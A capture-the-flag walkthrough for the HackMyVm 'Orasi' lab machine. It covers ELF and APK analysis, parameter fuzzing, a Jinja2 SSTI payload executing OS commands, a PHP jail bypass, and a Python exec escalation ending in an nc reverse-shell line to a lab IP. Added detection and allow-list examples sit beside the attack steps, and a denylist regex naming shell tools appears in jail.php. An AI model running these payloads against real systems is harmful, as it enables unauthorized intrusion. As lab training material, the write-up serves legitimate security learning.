HackMyVm Orasi Walkthrough (SSTI, ELF analysis, APK analysis)

The machine can be downloaded here.


Nmap port scan: 4 ports are open.

Anonymous FTP login gives us a file named "url".

Download "url" and check the file type: it is an ELF file.

Use the "strings" command to look for useful strings; we get nothing but a hint.

Checking the file in IDA, we notice some single characters which, read in order, form the string "/sh4d0w$s".

This string is a valid URL path on port 5000.
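As an added illustration (not part of the original walkthrough and not the Orasi binary), the Python script below shows why "strings" missed the path while IDA showed the characters: it parses an ELF64 header with struct, reimplements the strings scan with a minimum run length, and then collects single printable bytes in file order. The sample ELF image is constructed inline, with the characters of "/sh4d0w$s" stored one byte apart; that layout is an assumption made for the example.

```python
import struct

# ELF64 header: e_ident[16], then 13 fixed-width fields, 64 bytes in total.
ELF64_HEADER_FMT = "<16sHHIQQQIHHHHHH"


def build_sample_elf(payload_chars):
    """Constructed sample: minimal ELF64 header followed by a data area in which
    each character of payload_chars is separated by a NUL byte (assumed layout)."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # 64-bit, little-endian, SysV ABI
    header = struct.pack(ELF64_HEADER_FMT, ident,
                         2,          # e_type: ET_EXEC
                         0x3E,       # e_machine: x86-64
                         1,          # e_version
                         0x401000,   # e_entry (arbitrary sample value)
                         64, 0, 0,   # e_phoff, e_shoff, e_flags
                         64, 56, 0, 64, 0, 0)  # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    data = b"\x00".join(c.encode() for c in payload_chars)
    return header + b"\x00" * 8 + data + b"\x00" * 8


def parse_elf_header(blob):
    """Describe the ELF header (what `file` reports), or raise ValueError."""
    if len(blob) < 64 or blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    fields = struct.unpack(ELF64_HEADER_FMT, blob[:64])
    ident = fields[0]
    return {
        "class": {1: "ELF32", 2: "ELF64"}.get(ident[4], "unknown"),
        "endian": {1: "little", 2: "big"}.get(ident[5], "unknown"),
        "type": fields[1],
        "machine": fields[2],
        "entry": fields[4],
    }


def find_strings(blob, min_len=4):
    """Mimic `strings`: runs of printable ASCII at least min_len bytes long."""
    out, run = [], bytearray()
    for b in blob:
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode())
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode())
    return out


def scattered_chars(blob, start=0):
    """Join isolated printable bytes after `start` in file order: the manual
    'read the characters one by one in IDA' step, automated."""
    return "".join(s for s in find_strings(blob[start:], min_len=1) if len(s) == 1)


if __name__ == "__main__":
    sample = build_sample_elf("/sh4d0w$s")
    print(parse_elf_header(sample))
    print("strings -n 4:", find_strings(sample, 4))       # nothing useful, as in the walkthrough
    print("scattered:", scattered_chars(sample, start=64))  # /sh4d0w$s
```

The default minimum length of 4 is exactly what hides a string that the program stores or builds one character at a time; dropping to a length of 1 is noisy on a real binary, which is why the scan here is restricted to the data area after the header.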

The response is "No Input". It looks like we need to pass data to it through some parameter, so the next step is to find the parameter name.

Using common wordlists, we fail to fuzz the parameter name. So we go back to port 80, where there is only an index.html.

Opening index.html, we see some strange numbers and words.

According to the author's hint, these are "min_len max_len word_pattern" values for generating a dictionary.
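The dictionary step can be scripted. The Python generator below is an added example, not from the post or the author's tooling; it borrows crunch's placeholder convention (@ lowercase, , uppercase, % digit, ^ symbol, anything else taken literally) and, as its own assumption, produces words of each length from min_len to max_len by using the first that many positions of the pattern.

```python
import itertools
import string

# crunch-style placeholders; any other character in the pattern is a literal.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",
}


def expand_pattern(pattern):
    """Yield every word matching the pattern, one candidate set per position."""
    pools = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def generate_wordlist(min_len, max_len, pattern):
    """Words of every length in [min_len, max_len], each length using the
    leading positions of the pattern (assumed semantics for this example)."""
    if not 1 <= min_len <= max_len <= len(pattern):
        raise ValueError("need 1 <= min_len <= max_len <= len(pattern)")
    for length in range(min_len, max_len + 1):
        yield from expand_pattern(pattern[:length])


def wordlist_size(min_len, max_len, pattern):
    """Count without materialising: useful before writing a huge file."""
    total = 0
    for length in range(min_len, max_len + 1):
        size = 1
        for ch in pattern[:length]:
            size *= len(PLACEHOLDERS.get(ch, ch))
        total += size
    return total


if __name__ == "__main__":
    # sample values only; the real ones come from the machine's index.html
    print(wordlist_size(1, 2, "@%"))
    with open("param_names.txt", "w") as fh:
        for word in generate_wordlist(1, 2, "@%"):
            fh.write(word + "\n")
```

Checking wordlist_size first matters: a pattern like "@@@@@@" at length 6 is over 300 million lines, far more than a parameter-name fuzz should need.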

Use the dictionary to fuzz the parameter name.

Visiting the URL directly, it just echoes back the string we input.

In fact, it's an SSTI vulnerability.

Because nmap found that port 5000 runs "Werkzeug/1.0.1 Python/3.7.3", we can search for SSTI PoC code for a Python server, for example https://www.programmersought.com/article/91565232044/.

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}


Now we can run system commands.
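From the defender's side, the same payload is easy to spot in web server logs. The following Python detector is an added example, not part of the original post: it parses combined-format access log lines, percent-decodes each query parameter twice (once by the query parser, once more to catch double encoding), and flags template-engine markers such as {{ }} and {% %} together with the dunder attributes used to walk Python objects. The log lines and the parameter name q are constructed stand-ins, not data from the machine.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Markers that only make sense inside a template expression: the "{{7*7}}"
# style probe, block tags, and the object-walking attributes from the payload above.
SSTI_MARKERS = [
    r"\{\{.*?\}\}",
    r"\{%.*?%\}",
    r"__class__", r"__subclasses__", r"__globals__", r"__builtins__", r"__import__",
]
SSTI_RE = re.compile("|".join(SSTI_MARKERS), re.IGNORECASE | re.DOTALL)

# Apache/nginx "combined" access line: ip ident user [time] "method target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log; the request path mirrors the one found in the binary.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Mar/2021:01:14:20 +0000] "GET /sh4d0w$s?q=windy HTTP/1.1" 200 17',
    '192.0.2.10 - - [13/Mar/2021:01:14:25 +0000] "GET /sh4d0w$s?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 2',
    '192.0.2.10 - - [13/Mar/2021:01:14:31 +0000] "GET /sh4d0w$s?q=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D HTTP/1.1" 200 1200',
    '192.0.2.10 - - [13/Mar/2021:01:14:40 +0000] "GET /sh4d0w$s?q=%257B%257B7*7%257D%257D HTTP/1.1" 200 15',
]


def query_params(target):
    """(name, value) pairs of the query string, percent-decoded once by parse_qsl."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for name, value in query_params(m.group("target")):
        candidate = unquote_plus(value)  # second decode: catches %257B-style double encoding
        if SSTI_RE.search(candidate):
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "param": name,
                "value": candidate,
                "status": m.group("status"),
            }
    return None


def scan_log(lines):
    return [hit for hit in (scan_line(l) for l in lines) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} param={hit['param']} status={hit['status']} value={hit['value']!r}")
```

A 200 status on a request whose parameter contains {{7*7}} is the tell: the application rendered attacker input as a template rather than as data. The fix on the application side is to pass user input as a template variable (render_template_string("Hello {{ name }}", name=value)) instead of concatenating it into the template source.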

Modify the code and get a reverse shell.

In /home we find two users, "irida" and "kori". In kori's home folder there is a jail.php.

<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
if($var == null) die("Orasis Jail, argument missing\n");
function filter($var) {
        if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\/)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        $result = exec($var);
        echo "$result\n";
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>


sudo -l as www-data.

Although jail.php filters some keywords, we can still use "dash" to get a reverse shell and escalate to user kori.
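The reason jail.php can be bypassed is that its filter is a denylist: anything not explicitly listed is passed straight to exec(). The Python snippet below is an added example, not code from the machine: it reproduces the jail.php regex and places an allow-list check beside it (a fixed set of programs and a conservative argument character class, both assumptions of this example) so the two policies can be compared on the same inputs.

```python
import re
import shlex

# The regex from jail.php, reproduced verbatim so the comparison is fair.
JAIL_DENYLIST = re.compile(
    r"(`|bash|eval|nc|whoami|open|pass|require|include|file|system|/)", re.IGNORECASE
)


def denylist_filter(cmd):
    """What jail.php's filter() does: the command passes unless a listed token appears."""
    return JAIL_DENYLIST.search(cmd) is None


# Allow-list alternative (assumed policy for this example): only these programs,
# and every argument restricted to a character class with no shell metacharacters.
ALLOWED_PROGRAMS = {"date", "uptime", "ls"}
SAFE_ARG = re.compile(r"^[A-Za-z0-9._-]+$")


def allowlist_filter(cmd):
    """The command passes only if it is an allowed program with clean arguments."""
    try:
        argv = shlex.split(cmd)  # unterminated quotes raise ValueError
    except ValueError:
        return False
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return False
    return all(SAFE_ARG.match(arg) for arg in argv[1:])


def compare(cmd):
    """Show both verdicts side by side for one input."""
    return {"cmd": cmd, "denylist": denylist_filter(cmd), "allowlist": allowlist_filter(cmd)}


if __name__ == "__main__":
    for cmd in ("uptime", "ls -la", "bash", "dash", "ls $(id)", "ls; id"):
        print(compare(cmd))
```

The denylist blocks "bash" but passes "dash", "sh", "perl" and every other interpreter the author did not think of; the allow-list rejects all of them because a program has to be named to be permitted. An allow-list should also be paired with an argv-style call (in PHP, escapeshellarg() on each argument) rather than a single string handed to a shell.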

sudo -l as kori lets us get an apk file from user irida's home folder.

Download irida.apk, unzip it, then use d2j-dex2jar to get "classes-dex2jar.jar".

Use jd-gui to check the decompiled code. Searching for the keyword "irida" (the username), we come to com.alienum.irida.data.

Following the order of the string builder calls, and reading the author's hint at HackMyVm-->Palique, we can get the password of user irida.

Now we can log in via ssh as user irida.

sudo -l shows we can run a Python file in the /root folder.

Running the file and entering some string, we get an error and one line of the source code.

It looks like the "name" variable only accepts hex-format data. We convert "/bin/bash" to hex.

Run oras.py again; we get an error again, but this time another line of the source code, which is the key.

The Python file uses "exec" to run Python code. The reverse shell Python code is the following.

__import__( 'os' ).system('nc 192.168.56.150 1234 -e /bin/sh')

Convert it to hex format.

Finally, we get a reverse shell.

  • Comments
  •  Guest
     Posted 2021-03-13 01:14:20
  • Hi, I want to ask: how did you download irida.apk to your local machine? When I tried to download it, it said I had no permission.
    •  windy
       Posted 2021-03-13 17:52:05
    • I personally like to use nc x.x.x.x xxxx < irida.apk on the target machine, then nc -nlp xxxx > irida.apk on the attacking machine to receive it. It's been a while and I don't remember the details exactly; give it a try.
      •  Guest
         Posted 2021-03-14 21:27:48
      • It says insufficient permissions. Using python3 -m http.server and then wget also says insufficient permissions.
        •  windy
           Posted 2021-03-15 18:03:54
        • The current user must be kori, then use sudo cp to copy the apk file out of irida/, and download it after that. I have already deleted this machine, so I can't remember many of the details. You can ask other people in the Discord channel.
